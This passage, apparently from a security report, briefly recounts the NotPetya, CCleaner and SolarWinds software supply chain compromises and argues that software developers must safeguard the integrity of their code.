• June 2017 – NotPetya: Attackers compromised a Ukrainian software company and distributed a destructive payload with network-worm
capabilities through an update to the “MeDoc” financial software. After infecting systems using the software, the malware
spread to other hosts in the network and caused a worldwide disruption affecting many organizations
• September 2017 – CCleaner: Attackers compromised Avast’s CCleaner tool, used by millions to help keep their PC working
properly. The compromise was used to target large technology and telecommunications companies worldwide with a second-stage
payload
• In September 2019, attackers again likely targeted Avast’s CCleaner tool after gaining access to Avast’s network through a
temporary VPN profile. It is not clear whether or not the same operators from 2017 were involved in this incident
In each case, including the recent SolarWinds compromise, rather than targeting an organization directly through phishing or
exploitation of vulnerabilities, the attackers chose to compromise software developers directly and use the trust we place in them to
access other networks. This can effectively evade certain prevention and detection controls that have been tuned to trust well-known
programs
This pattern of software supply chain compromises will continue, and security teams cannot afford to ignore them. Protecting against
these attacks is not simple for any enterprise, and those who are responsible for writing and deploying software need to take
responsibility for the integrity of that code